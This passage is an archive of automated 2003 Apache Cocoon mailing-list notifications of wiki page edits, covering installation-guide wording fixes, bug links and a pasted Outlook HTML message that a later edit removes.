Dec 2003 20:59:59 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 66527 invoked from network); 1 Dec 2003 20:59:58 -0000 Received: from unknown (HELO otsrv1.iic.ugent.be) (161.129.204.104) by daedalus.apache.org with SMTP; 1 Dec 2003 20:59:58 -0000 Received: from otsrv1.iic.ugent.be (localhost [161.129.204.104]) by otsrv1.iic.ugent.be (8.11.6/8.11.6) with ESMTP id hB1L02p12976 for <[email protected]>; Mon, 1 Dec 2003 22:00:03 +0100 Date: Mon, 1 Dec 2003 22:00:03 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: [WIKI-UPDATE] HowWeUseBugzilla Mon Dec 1 22:00:02 2003 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Page: http://wiki.cocoondev.org/Wiki.jsp?page=HowWeUseBugzilla , version: 11 on Mon Dec 1 20:28:16 2003 by BertrandDelacretaz - * CocoonForms roadmap: + * CocoonForms roadmap (using bugzilla dependencies to group issues together): From [email protected] Mon Dec 01 22:00:12 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 69546 invoked from network); 1 Dec 2003 22:00:12 -0000 Received: from daedalus.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 1 Dec 2003 22:00:12 -0000 Received: (qmail 58600 invoked by uid 500); 1 Dec 2003 21:59:59 -0000 Delivered-To: [email protected] Received: (qmail 58580 invoked by uid 500); 1 Dec 2003 21:59:59 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 58568 invoked from network); 1 Dec 2003 21:59:59 -0000 Received: from unknown (HELO otsrv1.iic.ugent.be) (161.129.204.104) by daedalus.apache.org with SMTP; 1 Dec 2003 21:59:59 -0000 Received: from otsrv1.iic.ugent.be (localhost [161.129.204.104]) by otsrv1.iic.ugent.be (8.11.6/8.11.6) with ESMTP id hB1M03p13004 for <[email protected]>; Mon, 1 Dec 2003 23:00:04 +0100 Date: Mon, 1 Dec 2003 23:00:04 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: [WIKI-UPDATE] BeginnerInstallation Mon Dec 1 23:00:03 2003 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Page: http://wiki.cocoondev.org/Wiki.jsp?page=BeginnerInstallation , version: 40 on Mon Dec 1 21:57:03 2003 by 161.129.204.104 - In order to install cocoon you need + In order to install cocoon, you need ? + - You will get a directory tree which starts with __cocoon-2.0.4__. Within this ? ^ ^^^ + You will get a directory tree that starts with __cocoon-2.0.4__. Within this ? ^ ^^ - directory tree you find the web application archive __cocoon.war__ at the top level. + directory tree, you find the web application archive __cocoon.war__ at the top level. ? + - Besides this you find a whole set of documentation in HTML format under the subdirectory "docs". + Besides this, you find a whole set of documentation in HTML format under the subdirectory "docs". ? + From [email protected] Mon Dec 01 23:00:16 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 96585 invoked from network); 1 Dec 2003 23:00:15 -0000 Received: from daedalus.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 1 Dec 2003 23:00:15 -0000 Received: (qmail 45143 invoked by uid 500); 1 Dec 2003 23:00:01 -0000 Delivered-To: [email protected] Received: (qmail 45115 invoked by uid 500); 1 Dec 2003 23:00:00 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 45103 invoked from network); 1 Dec 2003 23:00:00 -0000 Received: from unknown (HELO otsrv1.iic.ugent.be) (161.129.204.104) by daedalus.apache.org with SMTP; 1 Dec 2003 23:00:00 -0000 Received: from otsrv1.iic.ugent.be (localhost [161.129.204.104]) by otsrv1.iic.ugent.be (8.11.6/8.11.6) with ESMTP id hB1N06p13031 for <[email protected]>; Tue, 2 Dec 2003 00:00:06 +0100 Date: Tue, 2 Dec 2003 00:00:06 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: [WIKI-UPDATE] BeginnerInstallation FirstFridayDecember2003 Tue Dec 2 00:00:06 2003 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Page: http://wiki.cocoondev.org/Wiki.jsp?page=BeginnerInstallation , version: 42 on Mon Dec 1 22:32:24 2003 by TonyCollen - You will learn how to retrieve and deploy cocoon into a running servlet container. This approach has been tested with tomcat 4.1.16 and newer releases. It should also work for other servlet containers. ? ^ + You will learn how to retrieve and deploy Cocoon into a running servlet container. This approach has been tested with tomcat 4.1.16 and newer releases. It should also work for other servlet containers. ? ^ Page: http://wiki.cocoondev.org/Wiki.jsp?page=FirstFridayDecember2003 , version: 10 on Mon Dec 1 22:09:16 2003 by JoergHeinicke - * RequestGenerator/request param handling problems (see [here|http://marc.theaimsgroup.com/?l=xml-cocoon-dev&m=106796038708692&w=2] (including reasonable sounding analysis), [here|http://marc.theaimsgroup.com/?t=107002913600001&r=1&w=2] (or as [Bug 25102|http://nagoya.apache.org/bugzilla/show_bug.cgi?id=25102]) and [here|http://marc.theaimsgroup.com/?l=xml-cocoon-users&m=106759767215764&w=2] (though it seems to be another problem)) + * RequestGenerator/request param handling problems: + ** the param values seems to be decoded once to much: see analysis for [RequestGenerator|http://marc.theaimsgroup.com/?l=xml-cocoon-dev&m=106796038708692&w=2] and for [RawRequestParameterModule|http://marc.theaimsgroup.com/?l=xml-cocoon-dev&m=107030283812533&w=4] ([thread view|http://marc.theaimsgroup.com/?t=107002913600001&r=1&w=4], [Bug 21502|http://nagoya.apache.org/bugzilla/show_bug.cgi?id=25102]) + ** another problem with RequestGenerator and CInclude is described [here|http://marc.theaimsgroup.com/?l=xml-cocoon-users&m=106759767215764&w=2] + ** another problem with RawRequestParamModule and CInclude is described [at Bug 24891|http://nagoya.apache.org/bugzilla/show_bug.cgi?id=24891] From [email protected] Tue Dec 02 00:00:27 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 20132 invoked from network); 2 Dec 2003 00:00:27 -0000 Received: from daedalus.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 2 Dec 2003 00:00:27 -0000 Received: (qmail 17986 invoked by uid 500); 2 Dec 2003 00:00:13 -0000 Delivered-To: [email protected] Received: (qmail 17962 invoked by uid 500); 2 Dec 2003 00:00:12 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 17942 invoked from network); 2 Dec 2003 00:00:12 -0000 Received: from unknown (HELO otsrv1.iic.ugent.be) (161.129.204.104) by daedalus.apache.org with SMTP; 2 Dec 2003 00:00:12 -0000 Received: from otsrv1.iic.ugent.be (localhost [161.129.204.104]) by otsrv1.iic.ugent.be (8.11.6/8.11.6) with ESMTP id hB200Ip13059 for <[email protected]>; Tue, 2 Dec 2003 01:00:18 +0100 Date: Tue, 2 Dec 2003 01:00:18 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: [WIKI-UPDATE] BeginnerInstallation Tue Dec 2 01:00:18 2003 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Page: http://wiki.cocoondev.org/Wiki.jsp?page=BeginnerInstallation , version: 43 on Mon Dec 1 23:10:44 2003 by TonyCollen - I assume you + I assume you : ? + From [email protected] Tue Dec 02 04:00:13 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 12800 invoked from network); 2 Dec 2003 04:00:13 -0000 Received: from daedalus.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 2 Dec 2003 04:00:13 -0000 Received: (qmail 98238 invoked by uid 500); 2 Dec 2003 03:59:53 -0000 Delivered-To: [email protected] Received: (qmail 98218 invoked by uid 500); 2 Dec 2003 03:59:53 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 98205 invoked from network); 2 Dec 2003 03:59:53 -0000 Received: from unknown (HELO otsrv1.iic.ugent.be) (161.129.204.104) by daedalus.apache.org with SMTP; 2 Dec 2003 03:59:53 -0000 Received: from otsrv1.iic.ugent.be (localhost [161.129.204.104]) by otsrv1.iic.ugent.be (8.11.6/8.11.6) with ESMTP id hB2401p13510 for <[email protected]>; Tue, 2 Dec 2003 05:00:02 +0100 Date: Tue, 2 Dec 2003 05:00:02 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: [WIKI-UPDATE] PDFGenerator Tue Dec 2 05:00:01 2003 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Page: http://wiki.cocoondev.org/Wiki.jsp?page=PDFGenerator , version: 1 on Tue Dec 2 03:36:05 2003 by 161.129.204.104 New page created: + WHere can i find it? + From [email protected] Tue Dec 02 06:00:16 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 50956 invoked from network); 2 Dec 2003 06:00:16 -0000 Received: from daedalus.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 2 Dec 2003 06:00:16 -0000 Received: (qmail 81694 invoked by uid 500); 2 Dec 2003 05:59:54 -0000 Delivered-To: [email protected] Received: (qmail 81654 invoked by uid 500); 2 Dec 2003 05:59:54 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 81633 invoked from network); 2 Dec 2003 05:59:54 -0000 Received: from unknown (HELO otsrv1.iic.ugent.be) (161.129.204.104) by daedalus.apache.org with SMTP; 2 Dec 2003 05:59:54 -0000 Received: from otsrv1.iic.ugent.be (localhost [161.129.204.104]) by otsrv1.iic.ugent.be (8.11.6/8.11.6) with ESMTP id hB2603p13560 for <[email protected]>; Tue, 2 Dec 2003 07:00:04 +0100 Date: Tue, 2 Dec 2003 07:00:04 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: [WIKI-UPDATE] PDFGenerator Tue Dec 2 07:00:03 2003 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Page: http://wiki.cocoondev.org/Wiki.jsp?page=PDFGenerator , version: 2 on Tue Dec 2 05:29:36 2003 by AntonioGallardo + See [FOP] + From [email protected] Tue Dec 02 13:00:14 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 997 invoked from network); 2 Dec 2003 13:00:13 -0000 Received: from daedalus.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 2 Dec 2003 13:00:13 -0000 Received: (qmail 25917 invoked by uid 500); 2 Dec 2003 13:00:11 -0000 Delivered-To: [email protected] Received: (qmail 25772 invoked by uid 500); 2 Dec 2003 13:00:11 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 25754 invoked from network); 2 Dec 2003 13:00:10 -0000 Received: from unknown (HELO otsrv1.iic.ugent.be) (161.129.204.104) by daedalus.apache.org with SMTP; 2 Dec 2003 13:00:10 -0000 Received: from otsrv1.iic.ugent.be (localhost [161.129.204.104]) by otsrv1.iic.ugent.be (8.11.6/8.11.6) with ESMTP id hB2D0Ap13741 for <[email protected]>; Tue, 2 Dec 2003 14:00:10 +0100 Date: Tue, 2 Dec 2003 14:00:10 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: [WIKI-UPDATE] CocoonReleaseHowTo FirstFridayDecember2003 XSPFundamentals Tue Dec 2 14:00:10 2003 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Page: http://wiki.cocoondev.org/Wiki.jsp?page=CocoonReleaseHowTo , version: 35 on Tue Dec 2 12:35:23 2003 by 161.129.204.104 - Test Page: http://wiki.cocoondev.org/Wiki.jsp?page=FirstFridayDecember2003 , version: 11 on Tue Dec 2 12:39:54 2003 by JoergHeinicke - ** the param values seems to be decoded once to much: see analysis for [RequestGenerator|http://marc.theaimsgroup.com/?l=xml-cocoon-dev&m=106796038708692&w=2] and for [RawRequestParameterModule|http://marc.theaimsgroup.com/?l=xml-cocoon-dev&m=107030283812533&w=4] ([thread view|http://marc.theaimsgroup.com/?t=107002913600001&r=1&w=4], [Bug 21502|http://nagoya.apache.org/bugzilla/show_bug.cgi?id=25102]) + ** the param values seems to be decoded once to much: see analysis for [RequestGenerator|http://marc.theaimsgroup.com/?l=xml-cocoon-dev&m=106796038708692&w=2] ([Bug 25132|http://nagoya.apache.org/bugzilla/show_bug.cgi?id=25132]) and for [RawRequestParameterModule|http://marc.theaimsgroup.com/?l=xml-cocoon-dev&m=107030283812533&w=4] ([thread view|http://marc.theaimsgroup.com/?t=107002913600001&r=1&w=4], [Bug 21502|http://nagoya.apache.org/bugzilla/show_bug.cgi?id=25102]) ? ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ Page: http://wiki.cocoondev.org/Wiki.jsp?page=XSPFundamentals , version: 17 on Tue Dec 2 12:27:35 2003 by 161.129.204.104 From [email protected] Tue Dec 02 14:00:26 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 43517 invoked from network); 2 Dec 2003 14:00:26 -0000 Received: from daedalus.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 2 Dec 2003 14:00:26 -0000 Received: (qmail 60175 invoked by uid 500); 2 Dec 2003 14:00:07 -0000 Delivered-To: [email protected] Received: (qmail 60138 invoked by uid 500); 2 Dec 2003 14:00:06 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 60071 invoked from network); 2 Dec 2003 14:00:06 -0000 Received: from unknown (HELO otsrv1.iic.ugent.be) (161.129.204.104) by daedalus.apache.org with SMTP; 2 Dec 2003 14:00:06 -0000 Received: from otsrv1.iic.ugent.be (localhost [161.129.204.104]) by otsrv1.iic.ugent.be (8.11.6/8.11.6) with ESMTP id hB2E06p13768 for <[email protected]>; Tue, 2 Dec 2003 15:00:06 +0100 Date: Tue, 2 Dec 2003 15:00:06 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: [WIKI-UPDATE] Flow Tue Dec 2 15:00:06 2003 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Page: http://wiki.cocoondev.org/Wiki.jsp?page=Flow , version: 40 on Tue Dec 2 13:35:49 2003 by 161.129.204.104 - or get these all as [one printable page|http://cocoon.cocoondev.org/wikiaggregate/cocoonwikidocs.html?pagenames=Flow+GettingStartedWithFlow+WhatIsFlow+DebugFlowScripts+JavascriptForJavaProgrammers+RhinoWithContinuations] ? ----------- + or get these all as [one printable page|http://cocoon.cocoondev.org/wikiaggregate/cocoonwikidocs.html?pagenames=Flow+WhatIsFlow+GettingStartedWithFlow+DebugFlowScripts+JavascriptForJavaProgrammers+RhinoWithContinuations] ? +++++++++++ From [email protected] Tue Dec 02 16:00:09 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 16621 invoked from network); 2 Dec 2003 16:00:09 -0000 Received: from daedalus.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 2 Dec 2003 16:00:09 -0000 Received: (qmail 30167 invoked by uid 500); 2 Dec 2003 16:00:03 -0000 Delivered-To: [email protected] Received: (qmail 30133 invoked by uid 500); 2 Dec 2003 16:00:02 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 30122 invoked from network); 2 Dec 2003 16:00:02 -0000 Received: from unknown (HELO otsrv1.iic.ugent.be) (161.129.204.104) by daedalus.apache.org with SMTP; 2 Dec 2003 16:00:02 -0000 Received: from otsrv1.iic.ugent.be (localhost [161.129.204.104]) by otsrv1.iic.ugent.be (8.11.6/8.11.6) with ESMTP id hB2G04p13825 for <[email protected]>; Tue, 2 Dec 2003 17:00:04 +0100 Date: Tue, 2 Dec 2003 17:00:04 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: [WIKI-UPDATE] George+Dimitrakopoulos 3DJNDIDatasourceWithBorlandEnterpriseServer5.1 Tue Dec 2 17:00:04 2003 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Page: http://wiki.cocoondev.org/Wiki.jsp?page=George+Dimitrakopoulos , version: 2 on Tue Dec 2 15:21:10 2003 by 161.129.204.104 - Ena dyo tria :) + <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> + <HTML><HEAD> + <TITLE>Μήνυµα</TITLE> + + <META content=Word.Document name=ProgId> + <META content="MSHTML 6.00.2800.1226" name=GENERATOR> + <META content="Microsoft Word 10" name=Originator><LINK + href="cid:[email protected]" rel=File-List><O:SMARTTAGTYPE + name="time" + namespaceuri="urn:schemas-microsoft-com:office:smarttags"></O:SMARTTAGTYPE><O:SMARTTAGTYPE + name="City" + namespaceuri="urn:schemas-microsoft-com:office:smarttags"></O:SMARTTAGTYPE><O:SMARTTAGTYPE + name="place" + namespaceuri="urn:schemas-microsoft-com:office:smarttags"></O:SMARTTAGTYPE><O:SMARTTAGTYPE + name="date" + namespaceuri="urn:schemas-microsoft-com:office:smarttags"></O:SMARTTAGTYPE><O:SMARTTAGTYPE + name="Street" + namespaceuri="urn:schemas-microsoft-com:office:smarttags"></O:SMARTTAGTYPE><O:SMARTTAGTYPE + name="address" + namespaceuri="urn:schemas-microsoft-com:office:smarttags"></O:SMARTTAGTYPE><!--[if gte mso 9]><xml> <o:OfficeDocumentSettings> <o:DoNotRelyOnCSS/> </o:OfficeDocumentSettings></xml><![endif]--><!--[if gte mso 9]><xml> <w:WordDocument> <w:SpellingState>Clean</w:SpellingState> <w:GrammarState>Clean</w:GrammarState> <w:DocumentKind>DocumentEmail</w:DocumentKind> <w:EnvelopeVis/> <w:Compatibility> <w:UseFELayout/> </w:Compatibility> <w:BrowserLevel>MicrosoftInternetExplorer4</w:BrowserLevel> </w:WordDocument></xml><![endif]--><!--[if !mso]> + <STYLE>st1\:* { + BEHAVIOR: url(#default#ieooui) + } + </STYLE> + <![endif]--> + <STYLE>@font-face { + font-family: MS Mincho; + } + @font-face { + font-family: Comic Sans MS; + } + @font-face { + font-family: Tahoma; + } + @font-face { + font-family: @MS Mincho; + } + P.MsoNormal { + FONT-SIZE: 12pt; MARGIN: 0cm 0cm 0pt; FONT-FAMILY: "Times New Roman"; mso-fareast-font-family: "MS Mincho"; mso-style-parent: ""; mso-pagination: widow-orphan + } + LI.MsoNormal { + FONT-SIZE: 12pt; MARGIN: 0cm 0cm 0pt; FONT-FAMILY: "Times New Roman"; mso-fareast-font-family: "MS Mincho"; mso-style-parent: ""; mso-pagination: widow-orphan + } + DIV.MsoNormal { + FONT-SIZE: 12pt; MARGIN: 0cm 0cm 0pt; FONT-FAMILY: "Times New Roman"; mso-fareast-font-family: "MS Mincho"; mso-style-parent: ""; mso-pagination: widow-orphan + } + A:link { + COLOR: blue; TEXT-DECORATION: underline; text-underline: single + } + SPAN.MsoHyperlink { + COLOR: blue; TEXT-DECORATION: underline; text-underline: single + } + A:visited { + COLOR: purple; TEXT-DECORATION: underline; text-underline: single + } + SPAN.MsoHyperlinkFollowed { + COLOR: purple; TEXT-DECORATION: underline; text-underline: single + } + P.MsoAutoSig { + FONT-SIZE: 12pt; MARGIN-LEFT: 0cm; MARGIN-RIGHT: 0cm; FONT-FAMILY: "Times New Roman"; mso-fareast-font-family: "MS Mincho"; mso-pagination: widow-orphan; mso-margin-top-alt: auto; mso-margin-bottom-alt: auto + } + LI.MsoAutoSig { + FONT-SIZE: 12pt; MARGIN-LEFT: 0cm; MARGIN-RIGHT: 0cm; FONT-FAMILY: "Times New Roman"; mso-fareast-font-family: "MS Mincho"; mso-pagination: widow-orphan; mso-margin-top-alt: auto; mso-margin-bottom-alt: auto + } + DIV.MsoAutoSig { + FONT-SIZE: 12pt; MARGIN-LEFT: 0cm; MARGIN-RIGHT: 0cm; FONT-FAMILY: "Times New Roman"; mso-fareast-font-family: "MS Mincho"; mso-pagination: widow-orphan; mso-margin-top-alt: auto; mso-margin-bottom-alt: auto + } + P { + FONT-SIZE: 12pt; MARGIN-LEFT: 0cm; MARGIN-RIGHT: 0cm; FONT-FAMILY: "Times New Roman"; mso-fareast-font-family: "MS Mincho"; mso-pagination: widow-orphan; mso-margin-top-alt: auto; mso-margin-bottom-alt: auto + } + SPAN.EmailStyle19 { + FONT-WEIGHT: normal; COLOR: black; FONT-STYLE: normal; FONT-FAMILY: Arial; TEXT-DECORATION: none; text-underline: none; mso-style-type: personal; mso-style-noshow: yes; mso-ansi-font-size: 12.0pt; mso-bidi-font-size: 12.0pt; mso-ascii-font-family: Arial; mso-hansi-font-family: Arial; mso-bidi-font-family: Arial; mso-text-animation: none; text-line-through: none + } + SPAN.EmailStyle20 { + COLOR: navy; FONT-FAMILY: Arial; mso-style-type: personal-reply; mso-style-noshow: yes; mso-ansi-font-size: 10.0pt; mso-bidi-font-size: 10.0pt; mso-ascii-font-family: Arial; mso-hansi-font-family: Arial; mso-bidi-font-family: Arial + } + DIV.Section1 { + page: Section1 + } + </STYLE> + <!--[if gte mso 10]><style> /* Style Definitions */ table.MsoNormalTable {mso-style-name:"Table Normal"; mso-tstyle-rowband-size:0; mso-tstyle-colband-size:0; mso-style-noshow:yes; mso-style-parent:""; mso-padding-alt:0cm 5.4pt 0cm 5.4pt; mso-para-margin:0cm; mso-para-margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:10.0pt; font-family:"Times New Roman";}</style><![endif]--><!--[if gte mso 9]><xml> <o:shapedefaults v:ext="edit" spidmax="1026" /></xml><![endif]--><!--[if gte mso 9]><xml> <o:shapelayout v:ext="edit"> <o:idmap v:ext="edit" data="1" /> </o:shapelayout></xml><![endif]--></HEAD> + <BODY lang=EN-US id=MailContainerBody style="tab-interval: 36.0pt" vLink=purple + link=blue bgColor=white leftMargin=0 + background=ATT-0-3B9A5A7A6E1AD811B413000255919F4A-ATT00008.gif topMargin=0 + name="Compose message area" CanvasTabStop="true" acc_role="text" + hb_focus_attach="true"> + <DIV>&nbsp;</DIV> + <DIV class=OutlookMessageHeader dir=ltr align=left><BR></FONT></DIV> + <DIV id=0></DIV><BR><SPAN id=hbblock> + <P></P></SPAN> + <P></P></BODY></HTML> + + + </FONT></P> + Page: http://wiki.cocoondev.org/Wiki.jsp?page=3DJNDIDatasourceWithBorlandEnterpriseServer5.1 , version: 1 on Tue Dec 2 15:14:59 2003 by 161.129.204.104 New page created: + lalakis from guatemala!!! + From [email protected] Tue Dec 02 17:00:15 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 52679 invoked from network); 2 Dec 2003 17:00:15 -0000 Received: from daedalus.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 2 Dec 2003 17:00:15 -0000 Received: (qmail 46130 invoked by uid 500); 2 Dec 2003 17:00:03 -0000 Delivered-To: [email protected] Received: (qmail 46092 invoked by uid 500); 2 Dec 2003 17:00:02 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 46041 invoked from network); 2 Dec 2003 17:00:02 -0000 Received: from unknown (HELO otsrv1.iic.ugent.be) (161.129.204.104) by daedalus.apache.org with SMTP; 2 Dec 2003 17:00:02 -0000 Received: from otsrv1.iic.ugent.be (localhost [161.129.204.104]) by otsrv1.iic.ugent.be (8.11.6/8.11.6) with ESMTP id hB2H04p13912 for <[email protected]>; Tue, 2 Dec 2003 18:00:04 +0100 Date: Tue, 2 Dec 2003 18:00:04 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: [WIKI-UPDATE] George+Dimitrakopoulos 3DJNDIDatasourceWithBorlandEnterpriseServer5.1 DeleteMe Tue Dec 2 18:00:04 2003 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Page: http://wiki.cocoondev.org/Wiki.jsp?page=George+Dimitrakopoulos , version: 3 on Tue Dec 2 16:13:49 2003 by JoergHeinicke - <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> - <HTML><HEAD> - - <TITLE>Μήνυµα</TITLE> - - <META content=Word.Document name=ProgId> - <META content="MSHTML 6.00.2800.1226" name=GENERATOR> - <META content="Microsoft Word 10" name=Originator><LINK - href="cid:[email protected]" rel=File-List><O:SMARTTAGTYPE - name="time" - namespaceuri="urn:schemas-microsoft-com:office:smarttags"></O:SMARTTAGTYPE><O:SMARTTAGTYPE - name="City" - namespaceuri="urn:schemas-microsoft-com:office:smarttags"></O:SMARTTAGTYPE><O:SMARTTAGTYPE - name="place" - namespaceuri="urn:schemas-microsoft-com:office:smarttags"></O:SMARTTAGTYPE><O:SMARTTAGTYPE - name="date" - namespaceuri="urn:schemas-microsoft-com:office:smarttags"></O:SMARTTAGTYPE><O:SMARTTAGTYPE - name="Street" - namespaceuri="urn:schemas-microsoft-com:office:smarttags"></O:SMARTTAGTYPE><O:SMARTTAGTYPE - name="address" - namespaceuri="urn:schemas-microsoft-com:office:smarttags"></O:SMARTTAGTYPE><!--[if gte mso 9]><xml> <o:OfficeDocumentSettings> <o:DoNotRelyOnCSS/> </o:OfficeDocumentSettings></xml><![endif]--><!--[if gte mso 9]><xml> <w:WordDocument> <w:SpellingState>Clean</w:SpellingState> <w:GrammarState>Clean</w:GrammarState> <w:DocumentKind>DocumentEmail</w:DocumentKind> <w:EnvelopeVis/> <w:Compatibility> <w:UseFELayout/> </w:Compatibility> <w:BrowserLevel>MicrosoftInternetExplorer4</w:BrowserLevel> </w:WordDocument></xml><![endif]--><!--[if !mso]> - <STYLE>st1\:* { - BEHAVIOR: url(#default#ieooui) - } - </STYLE> - <![endif]--> - <STYLE>@font-face { - font-family: MS Mincho; - } - @font-face { - font-family: Comic Sans MS; - } - @font-face { - font-family: Tahoma; - } - @font-face { - font-family: @MS Mincho; - } - P.MsoNormal { - FONT-SIZE: 12pt; MARGIN: 0cm 0cm 0pt; FONT-FAMILY: "Times New Roman"; mso-fareast-font-family: "MS Mincho"; mso-style-parent: ""; mso-pagination: widow-orphan - } - LI.MsoNormal { - FONT-SIZE: 12pt; MARGIN: 0cm 0cm 0pt; FONT-FAMILY: "Times New Roman"; mso-fareast-font-family: "MS Mincho"; mso-style-parent: ""; mso-pagination: widow-orphan - } - DIV.MsoNormal { - FONT-SIZE: 12pt; MARGIN: 0cm 0cm 0pt; FONT-FAMILY: "Times New Roman"; mso-fareast-font-family: "MS Mincho"; mso-style-parent: ""; mso-pagination: widow-orphan - } - A:link { - COLOR: blue; TEXT-DECORATION: underline; text-underline: single - } - SPAN.MsoHyperlink { - COLOR: blue; TEXT-DECORATION: underline; text-underline: single - } - A:visited { - COLOR: purple; TEXT-DECORATION: underline; text-underline: single - } - SPAN.MsoHyperlinkFollowed { - COLOR: purple; TEXT-DECORATION: underline; text-underline: single - } - P.MsoAutoSig { - FONT-SIZE: 12pt; MARGIN-LEFT: 0cm; MARGIN-RIGHT: 0cm; FONT-FAMILY: "Times New Roman"; mso-fareast-font-family: "MS Mincho"; mso-pagination: widow-orphan; mso-margin-top-alt: auto; mso-margin-bottom-alt: auto - } - LI.MsoAutoSig { - FONT-SIZE: 12pt; MARGIN-LEFT: 0cm; MARGIN-RIGHT: 0cm; FONT-FAMILY: "Times New Roman"; mso-fareast-font-family: "MS Mincho"; mso-pagination: widow-orphan; mso-margin-top-alt: auto; mso-margin-bottom-alt: auto - } - DIV.MsoAutoSig { - FONT-SIZE: 12pt; MARGIN-LEFT: 0cm; MARGIN-RIGHT: 0cm; FONT-FAMILY: "Times New Roman"; mso-fareast-font-family: "MS Mincho"; mso-pagination: widow-orphan; mso-margin-top-alt: auto; mso-margin-bottom-alt: auto - } - P { - FONT-SIZE: 12pt; MARGIN-LEFT: 0cm; MARGIN-RIGHT: 0cm; FONT-FAMILY: "Times New Roman"; mso-fareast-font-family: "MS Mincho"; 